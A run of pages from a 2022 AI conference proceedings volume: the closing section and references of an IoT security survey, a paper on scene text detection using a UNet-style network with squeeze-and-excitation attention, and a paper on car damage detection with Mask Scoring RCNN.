6 Conclusion The security and privacy problems of the IoT are crucial, since IoT technology has become an increasingly pervasive component of our daily lives. Due to the heterogeneity of IoT networks, security and privacy can easily be compromised. IoT security issues can be defended against using AI approaches, and integrating distributed learning strategies eliminates the need for a central control board. There are currently no relevant datasets for ML-based and DL-based security systems, making it difficult to evaluate their effectiveness in practice. In this comprehensive study, we have highlighted the IoT's security concerns, attacks, and security requirements. We examined some AI-based techniques that can provide security measures and indicated open issues and future research opportunities.


References
1. Yunana, K., Alfa, A.A., Misra, S., Damasevicius, R., Maskeliunas, R., Oluranti, J.: Internet of Things: applications, adoptions and components - a conceptual overview. In: Hybrid Intelligent Systems, pp. 494–504 (2021)
2. Razzaq, M.A., Gill, S.H., Qureshi, M.A., Ullah, S.: Security issues in the Internet of Things (IoT): a comprehensive study. Int. J. Adv. Comput. Sci. Appl. 8(6), 383 (2017)
3. Tahsien, S.M., Karimipour, H., Spachos, P.: Machine learning based solutions for security of Internet of Things (IoT): a survey. J. Netw. Comput. Appl. 161, 102630 (2020)
4. Hassija, V., Chamola, V., Saxena, V., Jain, D., Goyal, P., Sikdar, B.: A survey on IoT security: application areas, security threats, and solution architectures. IEEE Access 7, 82721–82743 (2019)
5. Fraga-Lamas, P., Fernández-Caramés, T.M., Suárez-Albela, M., Castedo, L., González-López, M.: A review on internet of things for defense and public safety. Sensors (Basel) 16(10), 1644 (2016). https://doi.org/10.3390/s16101644
6. Ali, I., Sabir, S., Ullah, Z.: Internet of things security, device authentication and access control: a review. arXiv preprint arXiv:1901.07309 (2019)
7. Ahanger, T.A., Aljumah, A., Atiquzzaman, M.: State-of-the-art survey of artificial intelligent techniques for IoT security. Comput. Netw. 206, 108771 (2022). https://doi.org/10.1016/j.comnet.2022.108771
8. Xiao, L., Wan, X., Lu, X., Zhang, Y., Wu, D.: IoT security techniques based on machine learning: how do IoT devices use AI to enhance security? IEEE Signal Process. Mag. 35(5), 41–49 (2018)
9. Gupta, S., Vyas, S., Sharma, K.P.: A survey on security for IoT via machine learning. In: 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA), pp. 1–5 (2020)
10. Mohanta, B.K., Jena, D., Satapathy, U., Patnaik, S.: Survey on IoT security: challenges and solution using machine learning, artificial intelligence and blockchain technology. Internet Things 11, 100227 (2020). https://doi.org/10.1016/J.IOT.2020.100227
11. Amiri-Zarandi, M., Dara, R.A., Fraser, E.: A survey of machine learning-based solutions to protect privacy in the Internet of Things. Comput. Secur. 96, 101921 (2020). https://doi.org/10.1016/j.cose.2020.101921
12. Wu, H., Han, H., Wang, X., Sun, S.: Research on artificial intelligence enhancing internet of things security: a survey. IEEE Access 8, 153826–153848 (2020)
13. Hindy, H., Bayne, E., Bures, M., Atkinson, R., Tachtatzis, C., Bellekens, X.: Machine learning based IoT intrusion detection system: an MQTT case study (MQTT-IoT-IDS2020 dataset). In: International Networking Conference, pp. 73–84 (2020)
14. Sara, B., Otman, A.: New learning approach for unsupervised neural networks model with application to agriculture field. Int. J. Adv. Comput. Sci. Appl. 11(5) (2020)
15. Chaymae, T., Elkhatir, H., Otman, A.: Recent advances in machine learning and deep learning in vehicular ad-hoc networks: a comparative study. In: The Proceedings of the International Conference on Electrical Systems & Automation, pp. 1–14 (2022)
16. Al-Fuqaha, A., Guizani, M., Mohammadi, M., Aledhari, M., Ayyash, M.: Internet of things: a survey on enabling technologies, protocols, and applications. IEEE Commun. Surv. Tutorials 17(4), 2347–2376 (2015)
17. Krčo, S., Pokrić, B., Carrez, F.: Designing IoT architecture(s): a European perspective. In: 2014 IEEE World Forum on Internet of Things (WF-IoT), pp. 79–84 (2014)
18. Jabraeil Jamali, M.A., Bahrami, B., Heidari, A., Allahverdizadeh, P., Norouzi, F.: IoT architecture. In: Towards the Internet of Things: Architectures, Security, and Applications, pp. 9–31. Springer, Cham (2020)

Semantic Segmentation Architecture for Text Detection with an Attention Module Soufiane Naim(B) and Noureddine Moumkine Mathematical Computer Science and Applications Laboratory, Mohammedia, Morocco [email protected], [email protected]

Abstract. Scene text detection is a very challenging problem due to the variability of text in size, font, color and orientation. The trend in research is to create models which detect bounding-box coordinates around text areas inside an image. In this work, however, we address the problem as a semantic segmentation task by creating masks that highlight these zones. Our model is a fully convolutional network inspired by the UNet architecture. It is a pixel-wise classification framework which outputs a prediction map having the same width and height as the input image. Pixels inside this map are labeled as belonging or not to a text area. To improve performance, we use transposed convolutions to upsample the feature maps in the decoder part. We add an attention module to our architecture in order to recalibrate channel-wise features, which increases the overall performance by 1%. We also propose to use the intersection-over-union loss to address the class-imbalance problem, since text generally occupies a very small number of pixels inside images. We conduct the training and test experiments on the ICDAR 2015 dataset. Our model reaches a MeanIoU score of 44.20%. Keywords: Fully convolutional network · Scene text detection · Semantic segmentation · Multi-oriented text · Attention block · Transposed convolution

1 Introduction Nowadays, text exists everywhere. Creating a system that detects it and extracts its content is of great importance, since it facilitates several tasks in human life. Such a system could be used by a tourist to capture text written in an unknown language in order to translate it, or to build autonomous cars capable of using text to guide the driver to the destination, etc. Nevertheless, detecting text in an image taken in open spaces is not an easy task. The captured image may suffer from occlusion, saturation, glare, fading, etc. [16, 17]. Sometimes the background takes on shapes that look like characters, which makes it difficult to distinguish them from real text. It should also be noted that text in a natural scene image is not always presented in a horizontal orientation; it can also appear in vertical, inclined or curved orientations. The size of the text is another factor that makes detection harder. An image can © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 359–367, 2023. https://doi.org/10.1007/978-3-031-35251-5_35


contain both large text, which will be easy to detect, and very small text, which will be difficult to identify. The surface occupied by text in an image also varies. Sometimes it is represented by a large number of pixels; at other times, when the text is very small, this proportion becomes very low, leading to a minor representation and therefore to an unbalanced representation. Scene text detection has been the subject of many research papers. The early ones are based on hand-crafted methods [9, 18, 19] which try to capture text properties such as texture or shape to highlight text regions. The great progress in this field is due to deep learning techniques, especially convolutional neural networks (CNN) [15], whose contribution has improved the quality of extraction. Deep learning methods [10, 20, 21] try to capture useful features within an image through intensive data training. These methods show better accuracy and more efficient performance. The contributions of our paper are as follows. 1) An efficient framework is proposed to detect text within a natural scene image in any orientation; our model outputs a semantic segmentation map where pixels are labeled as belonging or not belonging to a text area. 2) An attention module is used to improve the detection performance. The attention mechanism is known for its ability to focus only on pixels that describe objects within an image. Here we use an attention module that works on the channel dimension to ensure an exchange of useful information between channels.

2 Related Works Early research in the field of text detection and recognition was based on hand-crafted methods. The goal is to discriminate features of text areas within an image. These methods can be divided into two main streams: a) connected-component-based methods [1–3], which extract areas likely to contain text using segmentation techniques, then eliminate negative regions by using low-level features (stroke width, texture, etc.); b) sliding-window-based methods [4–6], in which several windows of different sizes are used to scan the whole image, and the regions covered by these windows are then classified according to the presence or absence of text. These different methods have made it possible to obtain correct results. The great progress in the field is due to the advent of deep learning techniques and the use of convolutional neural networks (CNN). Yao et al. [7] try to detect text in multiple orientations. They use a convolutional network to classify each pixel according to whether or not it belongs to a text zone. In addition, the angle of text inclination and the coordinates of the bounding box (BB) are also predicted. Zhan et al. [8] produce a segmentation map which indicates the regions containing text, then apply MSER [9] to extract candidate characters, which make it possible to deduce the orientation of the text as well as the coordinates of the bounding box. EAST [10] uses a model inspired by the UNet [11] architecture to output a prediction map that specifies whether each pixel belongs to a text area. Their model also predicts the coordinates of the BB in two different forms: a rectangular BB with an angle of inclination, and the coordinates of the four corners of the quadrilateral overlapping the text. In the rest of this article, we detail and explain our contribution, which consists of the creation of a semantic segmentation map that highlights regions where text is present.


3 The Proposed Method
3.1 Architecture Our main goal is to create a semantic segmentation model (Fig. 1) for scene text detection. The output of our model is a prediction map where pixels belonging to a text zone are highlighted. Scene images may contain text in any orientation, with different fonts and sizes, which makes detection very hard. In addition, the background may have shapes that look like characters, leading to false detections. To deal with such challenges, we propose a fully convolutional network (FCN) [23] inspired by the UNet architecture, combined with transposed convolutions and an attention module to improve its accuracy. Our framework can be decomposed into two parts. The first one is the encoder part, which receives a natural scene image (w × h × c) as input. The objective here is to capture important features that describe text regions inside the image. At the same time, the dimensions of the feature maps in the encoder should decrease to avoid heavy computation. In our proposed architecture, we use DenseNet [12] as the backbone in this stage. The DenseNet architecture is composed of 4 dense blocks with a growth rate of k = 32. This architecture is well known for its capability to extract rich features within an image and to prevent the vanishing gradient phenomenon. The second part is the decoder. It is composed of four blocks; each one receives a feature map as input and doubles its size using a transposed convolution [22]. The advantage of this technique is that it increases the size of the input feature map while learning the best parameters to realize this transition. The output of the transposed convolution is concatenated with the encoder layer having the same width and height. Then, an attention block is applied.
3.2 Attention Block Attention is a mechanism that looks into an image and focuses only on the relevant parts that could help to improve model performance. In our work, we use the squeeze-and-excitation (SE) module [13] (Fig. 2), which works on each channel of the feature map to extract relationships between them. In each block of the decoder, the SE module is placed just after the concatenation layer to merge the important features that exist in its channels. In a convolutional neural network, the lower layers detect general features (lines, edges, etc.) while the upper ones tend to detect complete objects (in our case, the characters composing text areas). The intuition behind the SE module is to fuse both kinds of information in order to get a better representation. The SE module takes a convolutional block as input. It starts by squeezing each of its channels to a single numeric value using average pooling. Then a fully connected layer with ReLU [24] activation is applied to add some nonlinearity. A second fully connected layer is then applied; this layer uses the sigmoid activation function to map values into the range 0 to 1. Finally, each channel of the input convolutional block is weighted based on the output of the SE module.
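The following minimal PyTorch sketch illustrates Sections 3.1 and 3.2: one decoder block that upsamples with a transposed convolution, concatenates the result with the matching encoder feature map, and applies the squeeze-and-excitation module right after the concatenation. It is not the authors' code, and the SE reduction ratio of 16 is an assumption the paper does not state.

```python
# A minimal sketch of one decoder block (transposed conv -> concat -> SE), assuming
# the encoder skip feature already has the target spatial size; r = 16 is assumed.
import torch
import torch.nn as nn

class SEBlock(nn.Module):
    def __init__(self, channels: int, reduction: int = 16):
        super().__init__()
        self.pool = nn.AdaptiveAvgPool2d(1)                    # squeeze each channel to one value
        self.fc = nn.Sequential(
            nn.Linear(channels, channels // reduction), nn.ReLU(inplace=True),
            nn.Linear(channels // reduction, channels), nn.Sigmoid(),
        )

    def forward(self, x):
        b, c, _, _ = x.shape
        w = self.fc(self.pool(x).view(b, c)).view(b, c, 1, 1)
        return x * w                                           # excitation: re-weight the channels

class DecoderBlock(nn.Module):
    def __init__(self, in_ch: int, skip_ch: int, out_ch: int):
        super().__init__()
        self.up = nn.ConvTranspose2d(in_ch, out_ch, kernel_size=2, stride=2)  # doubles H and W
        self.se = SEBlock(out_ch + skip_ch)

    def forward(self, x, skip):
        x = torch.cat([self.up(x), skip], dim=1)   # concatenate with the same-size encoder map
        return self.se(x)                          # SE module right after the concatenation
```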


3.3 Loss Text in scene images appears in multiple forms and sizes, and the binary cross-entropy loss does not work well in this case. Instead, the IoU loss is suitable when the size of objects changes tremendously within an image. The IoU loss measures the intersection between the predicted and ground-truth areas over their union. To obtain better performance, we choose to use it in the training process. Its value is given as:

IoU loss = 1 − |X ∩ Y| / |X ∪ Y|   (1)

where X and Y represent respectively the predicted labels and the ground-truth ones.
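A minimal PyTorch formulation of the loss in Eq. (1) for soft binary masks could look as follows; the small constant eps used to avoid division by zero is an implementation assumption, not something stated in the paper.

```python
# Hedged sketch of the IoU loss of Eq. (1), computed on soft (sigmoid) masks.
import torch

def iou_loss(pred: torch.Tensor, target: torch.Tensor, eps: float = 1e-6) -> torch.Tensor:
    """pred: probabilities in [0, 1]; target: binary ground-truth mask, same shape."""
    pred, target = pred.flatten(1), target.flatten(1)
    inter = (pred * target).sum(dim=1)                       # |X ∩ Y| (soft)
    union = pred.sum(dim=1) + target.sum(dim=1) - inter      # |X ∪ Y| (soft)
    return (1.0 - (inter + eps) / (union + eps)).mean()      # average over the batch
```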

Fig. 1. The architecture of our model. Descriptions of blocks 1 to 4 are detailed in Table 1.


Table 1. Description of blocks 1 to 4 of the encoder.

Block | Layers
Block 1 | 3 × 3 max pool, stride 2; [1 × 1 conv, 3 × 3 conv] × 6
Block 2 | 1 × 1 conv; 2 × 2 avg pool, stride 2; [1 × 1 conv, 3 × 3 conv] × 12
Block 3 | 1 × 1 conv; 2 × 2 avg pool, stride 2; [1 × 1 conv, 3 × 3 conv] × 24
Block 4 | 1 × 1 conv; 2 × 2 avg pool, stride 2; [1 × 1 conv, 3 × 3 conv] × 16; 1 × 1 conv

Fig. 2. Squeeze and excitation blocks. The picture has been taken from the original article.

4 Experiments To evaluate our model, we train and test it on the ICDAR 2015 [14] dataset, which is composed of 1500 images (1000 images for training and 500 for testing). The text in the images is annotated at word level and appears in multiple orientations. The quality of the images is very low. The training process is executed on a Tesla P100-PCIE GPU with 16 GB of RAM. As the optimizer, we use Adam with beta1 and beta2 set to 0.9 and 0.999, respectively.


Fig. 3. Examples of predictions made by our model. On the left the original image, in the center the prediction made by our model and on the right the ground truth masks

5 Results 5.1 Quantitative Results The strength of our work lies in the possibility of using our model as a region proposal network and its output as a feature map, which can later be combined with anchors and a classifier to predict the BB coordinates. Most research papers in the scene text detection domain focus on predicting the BB rectangles surrounding text areas. Unfortunately, due to the lack of research that focuses


on the creation of semantic segmentation masks over text, we were unable to make a comparative discussion in this section. The proposed method reaches a Mean Intersection over Union (MeanIoU) score of 44.20% on the ICDAR 2015 dataset. This result is very promising, since text inside images is very hard to detect. To evaluate the impact of the SE attention module, an ablation study has been conducted: after measuring the performance of the entire model, the training conditions were fixed and a new model without the SE blocks was trained. Table 2 shows how the SE modules improve the detection performance. Under the same conditions, the SE blocks increase the MeanIoU score by 1%.

Table 2. Performance of our model with and without SE modules.

Method | Mean IoU (%)
Our model with SE blocks | 44.20
Our model without SE blocks | 43.2

5.2 Qualitative Results The ICDAR 2015 dataset is very challenging. Text inside its images appears in many orientations and sizes. In some cases, the text is very tiny and located in areas that make prediction harder. In addition, many pictures suffer from weaknesses like blur, fading and saturation. Even under such challenges, we can observe that our model does a good job. Figure 3 shows some examples of predictions made by our model. It is clear that our model functions correctly and is able to detect text of any size or orientation. Nevertheless, it should be noted that our model still has difficulty extracting text, especially when the quality of the image is low or when the text is very tiny.

6 Conclusion In this paper, we have presented a semantic segmentation architecture to create masks over text inside images. Our proposed method works well with text in multiple orientations and of various sizes. The shape of our architecture is inspired by the UNet model and benefits from the attention mechanism. The model performance is reasonable and can be improved by adding more training images and more training epochs. The next step should be the integration of a new output branch whose aim is to predict the coordinates of the quadrangle surrounding the text area.


References 1. Bagri, N., Johari, P.K.: A comparative study on feature extraction using texture and shape for content based image retrieval. Int. J. Adv. Sci. Technol. 80, 41–52 (2015). https://doi.org/10. 14257/ijast.2015.80.04 2. Greenhalgh, J., Mirmehdi, M.: Real-time detection and recognition of road traffic signs. IEEE Trans. Intell. Transp. Syst. 13(4), 1498–1506 (2012) 3. Shi, C., Wang, C., Xiao, B., Zhang, Y., Gao, S.: Scene text detection using graph model built upon maximally stable extremal regions. Pattern Recogn. Lett. 34(2), 107–116 (2013) 4. Pan, Y.F., Hou, X., Liu, C.L.: A hybrid approach to detect and localize texts in natural scene images. IEEE Trans. Image Process. 20(3), 800–813 (2010) 5. Lee, J.J., Lee, P.H., Lee, S.W., Yuille, A., Koch, C.: Adaboost for text detection in natural scene. In: 2011 International Conference on Document Analysis and Recognition, pp 429–434 (2011a) 6. Coates, A., et al.: Text detection and character recognition in scene images with unsupervised feature learning. In: IEEE International Conference on Document Analysis and Recognition, pp 440–445 (2011) 7. Yao, C., Bai, X., Sang, N., Zhou, X., Zhou, S., Cao, Z.: Scene text detection via holistic,multichannel prediction (2016). arXiv preprint arXiv:1606.09002 8. Zhu, Y., Yao, C., Bai, X.: Scene text detection and recognition: recent advances and future trends. Front. Comp. Sci. 10(1), 19–36 (2016) 9. Neumann, L., Matas, J.: Real-time scene text localization and recognition. In 2012 IEEE conference on computer vision and pattern recognition (CVPR) (pp. 3538–3545). IEEE (2012) 10. Zhou, X., et al.: EAST: an efficient and accurate scene text detector. In The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) (2017) 11. Li, X., Chen, H., Qi, X., Dou, Q., Fu, C.-W., Heng, P.-A.: H-DenseUNet: hybrid densely connected UNet for liver and tumor segmentation from CT volumes. IEEE Trans. Med. Imaging 37(12), 2663–2674 (Dec.2018). https://doi.org/10.1109/TMI.2018.2845918 12. Huang, G., Liu, Z., Weinberger, K.Q., van der Maaten, L.: Densely connected convolutional networks. arXiv:1608.06993 (2016) 13. Hu, J., Shen, L., Sun, G.: Squeeze-and-Excitation Networks. IEEE/CVF Conf. Comput. Vis. Pattern Recogn. 2018, 7132–7141 (2018). https://doi.org/10.1109/CVPR.2018.00745 14. Karatzas, D., et al.: ICDAR 2015 competition on robust reading. In: Proceedings of the 13th International Conference Document Analysis Recognition (ICDAR), pp. 1156–1160 Aug (2015) 15. Kawa, S., Kawano, M.: An overview. In: Umehara, H., Okazaki, K., Stone, J.H., Kawa, S., Kawano, M. (eds.) IgG4-Related Disease, pp. 3–7. Springer, Tokyo (2014). https://doi.org/ 10.1007/978-4-431-54228-5_1 16. Zhu, Y., Yao, C., Bai, X.: Scene text detection and recognition: recent advances and future trends. Front. Comp. Sci. 10(1), 19–36 (2016). https://doi.org/10.1007/s11704-015-4488-0 17. Zhang, Z., Zhang, C., Shen, W., Yao, C., Liu, W., Bai, X.: Multi-oriented text detection with fully convolutional networks. arXiv preprint arXiv:1604.04018 (2016) 18. Epshtein, B., Ofek, E., Wexler, Y.: Detecting text in natural scenes with stroke width transform. In: Computer Vision and Pattern Recognition (CVPR), 2010 IEEE Conference on, pp. 2963– 2970. IEEE (2010) 19. Zamberletti, A., Noce, L., Gallo, I.: Text localization based on fast feature pyramids and multi-resolution maximally stable extremal regions. In: Jawahar, C.V., Shan, S. (eds.) ACCV 2014. LNCS, vol. 9009, pp. 91–105. Springer, Cham (2015). https://doi.org/10.1007/978-3319-16631-5_7


20. Gupta, A., Vedaldi, A., Zisserman, A.: Synthetic data for text localisation in natural images, pp. 2315–2324 (2016) 21. Zhang, Z., Zhang, C., Shen, W., Yao, C., Liu, W., Bai, X.: Multioriented text detection with fully convolutional networks. In: Computer Vision and Pattern Recognition (2016) 22. Dumoulin, V., Visin, F.: A guide to convolution arithmetic for deep learning (2016). arXiv preprint arXiv:1603.07285 23. Shelhamer, E., Long, J., Darrell, T.: Fully convolutional networks for semantic segmentation. IEEE Trans. Pattern Anal. Mach. Intell. 39(4), 640–651 (2017). https://doi.org/10.1109/ TPAMI.2016.2572683 24. Nair, V., Hinton, G.E.: Rectified linear units improve restricted boltzmann machines. In: ICML (2010)

Car Damage Detection Based on Mask Scoring RCNN Farah Oubelkas1(B) , Lahcen Moumoun1,2 , and Abdellah Jamali1,2 1 Hassan First University of Settat, Faculté Sciences et Technique, Settat, Morocco

[email protected] 2 Laboratoire de Recherche Informatique, Réseaux, Mobilité et Modélisation, Settat, Morocco

Abstract. The growth of the car industry is closely linked to the rise in the number of car accidents. As a result, insurance companies must deal with several claims at the same time while also addressing claims leakage. To resolve these issues, we propose a car damage detection system based on Mask Scoring RCNN. The experiment first builds a dataset by collecting car damage pictures of different types and from different angles for pre-processing, then uses Mask Scoring RCNN for training. It is envisaged that this method would assist insurers in correctly classifying the damage and reducing the time spent on damage detection. The test results demonstrate that the proposed system has better masking accuracy in the case of complex images, allowing the car damage detection task to be completed swiftly and easily. Keywords: Computer vision · Mask Scoring RCNN · Car-damage detection · Mask detection accuracy

1 Introduction We live in the big data age, in which vast volumes of data are generated across all fields of research and industry. Deep learning is an innovative approach that is now gaining a lot of attention and has been applied effectively to a variety of computer vision challenges. One of the key research topics in computer vision is object detection. RCNN [1], Fast RCNN [3], Faster RCNN [10] and Mask RCNN [1] are currently the most common detection algorithms. However, they need a substantial quantity of training data, which is sometimes challenging to obtain. The positioning ability of the detection frame is restricted, and as the number of convolution layers rises, the vanishing gradient problem frequently occurs. To resolve these drawbacks, Mask Scoring RCNN was proposed [12]. In this paper, we propose a car damage segmentation and detection system based on the Mask Scoring RCNN algorithm to mark the damaged areas of a car. This paper improves the default model's architecture by optimizing the residual network (ResNet) and adjusting the hyperparameters and the parameters of the anchor box in order to improve the accuracy of the model. The proposed system can be used by insurance companies to process claims rapidly. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 368–376, 2023. https://doi.org/10.1007/978-3-031-35251-5_36


2 Related Work There are two types of instance segmentation methods now in use: the first is based on detection, and the second is based on segmentation. Detection-based approaches use detectors to obtain the region of each instance and then predict the mask for each region. An example of such detectors is Faster RCNN. Mask RCNN is an instance segmentation algorithm developed on top of Faster RCNN; it is essentially an improved version of Faster RCNN and can be used for different types of problems: object detection, semantic segmentation or instance segmentation. It was first proposed by He et al. [5]. Based on this algorithm, Chen et al. [8] introduce MaskLab, a new approach that improves the results of Mask RCNN by using position-sensitive scores. However, the mask instance segmentation is not perfect, and certain locations where the damage is not visible cannot be separated. The major problem of all the approaches cited above is that the score of the mask is based on the classification precision, which is not accurate, resulting in a huge discrepancy in the prediction results. Segmentation-based methods first employ pixel-level prediction to predict the category label and then use a clustering algorithm to group the pixels into instances. To cluster the pixels, [13] adopt spectral clustering, while Bai et al. [11] utilize the watershed algorithm to categorize pixels and forecast pixel-level energy levels. All these methods use the average pixel-level classification score to measure the quality of the instance mask. It is possible that the detection results are great and the classification score is high, but the mask quality is low. Background clutter and occlusion can also contribute to this discrepancy. That is where detection score correction methods appeared; their main focus is to correct the classification score of the detection box. Cheng et al. utilize a separate network to rectify the score of false-positive samples. SoftNMS [2] corrects low-score boxes by using the overlap between two boxes, while Tychsen-Smith et al. [6] propose Fitness NMS, a method that uses the IoU between the identified bounding boxes and their ground truth to adjust the detection score. Huang et al. [12] propose Mask Scoring RCNN. The key distinction between the last two methods is that the former formulates box IoU prediction as a classification task while Mask Scoring RCNN formulates it as a regression task. Mask Scoring RCNN is the method implemented in this paper to detect car damage. It solves the problem of Mask RCNN, which uses the classification confidence to measure the score of the mask; instead, it proposes a new evaluation method by adding a MaskIoU head, which takes the RoI features and the predicted mask as input to obtain the score of the model. Compared to other traditional detection methods, Mask Scoring RCNN is extremely effective. It has been used to detect and classify domestic garbage [9], in the medical field to detect breast tumors [7], and in agriculture to detect apple flowers [14], but it has never been used in the field of car damage detection before. In this paper, we apply Mask Scoring RCNN to detect and segment the damaged area, which can be useful for insurance companies to automate the process.


3 Proposed Method The car damage detection and segmentation model based on Mask Scoring RCNN implemented in this paper is shown in Fig. 1 below.

Fig. 1. The flow of the car damage detection and segmentation system.

The first step of the flow process is the collection of the image. The image is labelled in COCO JSON format using the LabelMe annotation tool. The image is fed to the Mask Scoring RCNN for feature extraction, classification and segmentation. As output, we get the detected car damage and the predicted mask. 3.1 Mask Scoring RCNN Mask Scoring RCNN is an instance segmentation framework: a Mask RCNN with an additional MaskIoU head that predicts the mask IoU score. Figure 2 depicts the four steps of our proposed method based on Mask Scoring RCNN. The first step, feature extraction, employs a ResNet-50 + FPN backbone architecture to obtain the corresponding feature map. The second step, region of interest (RoI) generation, extracts RoIs with an RPN. The third step extracts RoI features via RoIAlign, then performs box regression, classification using softmax, and mask prediction with an FCN. The last step, the MaskIoU head, aims to regress the IoU between the predicted mask and its ground-truth mask. To make the predicted mask have the same spatial size as the RoI feature, we apply a max pooling layer with a kernel size of 2 and a stride of 2 before concatenating them. The MaskIoU head is made up of four convolution layers and three fully connected layers. For the four convolution layers, we follow the mask head and set the kernel size and filter number to 3 and 256 for each convolutional layer. For the three fully connected layers, we follow the RCNN head and set the outputs to 1024 for the first


two fully connected layers, while the output of the final fully connected layer is set to five because we have 5 classes.

Fig. 2. Mask Scoring RCNN architecture
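To make the MaskIoU head of Sect. 3.1 concrete, the sketch below shows one possible PyTorch implementation with the stated four 3 × 3 convolutions (256 filters), two 1024-unit fully connected layers and a five-output regression layer. The RoI feature size of 256 × 14 × 14 and the 28 × 28 predicted mask are assumptions based on the usual Mask R-CNN configuration rather than values given in the paper.

```python
# Hedged sketch of a MaskIoU head: pooled predicted mask is concatenated with the
# RoI feature, then passed through 4 conv layers and 3 FC layers (assumed sizes).
import torch
import torch.nn as nn

class MaskIoUHead(nn.Module):
    def __init__(self, roi_channels: int = 256, num_classes: int = 5):
        super().__init__()
        layers, in_ch = [], roi_channels + 1            # RoI feature + pooled mask channel
        for _ in range(4):                              # four 3x3 convolutions, 256 filters each
            layers += [nn.Conv2d(in_ch, 256, kernel_size=3, padding=1), nn.ReLU(inplace=True)]
            in_ch = 256
        self.convs = nn.Sequential(*layers)
        self.fcs = nn.Sequential(                       # three fully connected layers
            nn.Flatten(),
            nn.Linear(256 * 14 * 14, 1024), nn.ReLU(inplace=True),
            nn.Linear(1024, 1024), nn.ReLU(inplace=True),
            nn.Linear(1024, num_classes),               # one IoU regression output per class
        )

    def forward(self, roi_feat, pred_mask):
        # pred_mask: (N, 1, 28, 28) -> (N, 1, 14, 14) so it matches the RoI feature size
        mask = nn.functional.max_pool2d(pred_mask, kernel_size=2, stride=2)
        return self.fcs(self.convs(torch.cat([roi_feat, mask], dim=1)))
```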

3.2 Transfer Learning In this paper, we use transfer learning to shorten training time and avoid overfitting of the model. In addition, it was difficult to collect enough training data covering the different types of damage: our dataset is small compared with the giant open-source datasets available online. Transfer learning transfers the knowledge gained from training a model in a source domain to a new model that solves a target task. In this paper, a ResNet backbone network pretrained on the COCO dataset is used. We remove the last layers of the pretrained model and replace them with untrained layers. The default backbone network of Mask RCNN is ResNet-101; however, with too many layers, the network becomes severely slow. Instead, in this experiment, we use a ResNet-50 based FPN network, that is, 50 layers, in order to improve the running speed of the algorithm and the generalization performance of the model. The improved ResNet backbone architecture, as shown in Fig. 3, uses pre-activation of the weight layers instead of post-activation. This has two advantages. First, back-propagation satisfies the requirement, and information transmission is unaffected. Second, the BN layer serves as a pre-activation layer, with the


term ‘pre’ referring to the weight of the convolutional layer. This improves the model’s regularization, as well as its generalization performance.

Fig. 3. ResNet V1 and ResNet V2 structure
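The transfer-learning step of Sect. 3.2 can be sketched as below using torchvision's Mask R-CNN with a COCO-pretrained ResNet-50 FPN backbone as a stand-in; the MaskIoU head of Mask Scoring RCNN would be added on top of this. Only the class count of 5 damage types plus background comes from the paper; the rest is a hedged illustration, not the authors' implementation.

```python
# Hedged sketch: load a COCO-pretrained Mask R-CNN (ResNet-50 FPN) and replace its
# heads for 5 damage classes + background, i.e. the transfer-learning step.
import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection.mask_rcnn import MaskRCNNPredictor

def build_model(num_classes: int = 6):  # 5 damage types + background
    model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)
    # replace the box classification head
    in_feat = model.roi_heads.box_predictor.cls_score.in_features
    model.roi_heads.box_predictor = FastRCNNPredictor(in_feat, num_classes)
    # replace the mask prediction head
    in_feat_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels
    model.roi_heads.mask_predictor = MaskRCNNPredictor(in_feat_mask, 256, num_classes)
    return model
```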

4 Results and Discussion 4.1 Dataset 528 damaged car images were collected (for training and testing) from Google and daily photographs. Each image has a maximum of 5 damage types and a minimum of 1. We tried to cover different angles and different types of damage (headlamp, hood, rear bumper, front bumper and door). However, rear bumper damage is rare and has few variants; therefore it makes up just around 14% of the overall dataset. The images come in different sizes, so in order to feed them to Mask Scoring RCNN we normalized them with a script to 1024 × 1024 pixels. To train Mask Scoring RCNN, we needed not only the images but also the corresponding masks. The annotation of the dataset is done using LabelMe, an open-source image annotation tool, to label the damaged area and produce a mask containing the segmentation information of the damage, as shown in Fig. 4.


Fig. 4. Labelme annotation image
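The normalization script mentioned in Sect. 4.1 could be as simple as the following hedged sketch, which resizes every image to 1024 × 1024 pixels; the folder names are placeholders, not paths from the study.

```python
# Hedged sketch of the image-normalization step: resize all images to 1024 x 1024.
from pathlib import Path
from PIL import Image

src, dst = Path("raw_images"), Path("normalized_images")   # placeholder folders
dst.mkdir(exist_ok=True)
for img_path in src.glob("*.jpg"):
    Image.open(img_path).convert("RGB").resize((1024, 1024)).save(dst / img_path.name)
```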

4.2 Training Platform The model training is done on Ubuntu 64-bit with an NVIDIA GeForce MX250 GPU and 16 GB of memory. The virtual environment must be as follows:
– PyTorch ≥ 1.3
– Python ≥ 3.6
– torchvision that matches the PyTorch installation
– OpenCV
– Pycocotools
– gcc & g++ ≥ 4.9

475 images were used for training and 52 images for testing. To better illustrate the benefits of Mask Scoring RCNN, we used the same dataset to compare the results obtained with Mask Scoring RCNN and with its precursor Mask RCNN. 4.3 Evaluation Metric To evaluate the performance of the proposed model, we use the mean intersection over union (MIoU), together with

Precision = TP / (TP + FP), Recall = TP / (TP + FN)

where TP is the number of true positives, FP the number of false positives and FN the number of false negatives. 4.4 Results 52 car damage pictures were used to evaluate the model. An example of the test results of Mask Scoring RCNN is shown in the figure below: the damage to be detected in the image has been precisely circled and labelled with the category of the damage.


Fig. 5. Mask Scoring RCNN test results (Result 1 and Result 2)

In Result 1 of Fig. 5, there is only one type of damage, and it is correctly identified and marked. Result 2 is more challenging: there are different types of damage, and two of them (headlamp and front bumper) are intertwined. Nevertheless, the segmentation and identification prove to be quite good, and the two types of damage are correctly classified with a high accuracy score. The analysis of the test results shows that the more complex the image, the lower the segmentation quality. When the image's background is clean, even with intertwined damage types, the segmentation accuracy is good, around 96%. Figure 6 shows the accuracy on the test dataset.

Fig. 6. Accuracy of Mask Scoring RCNN over training epochs


4.5 Comparison with Mask RCNN To demonstrate the high detection performance of Mask Scoring RCNN, we compared its results with those of its predecessor, Mask RCNN, on an image in which the different types of damage to be identified are overlapping.

Fig. 7. Comparison of test results between Mask RCNN and Mask Scoring RCNN.

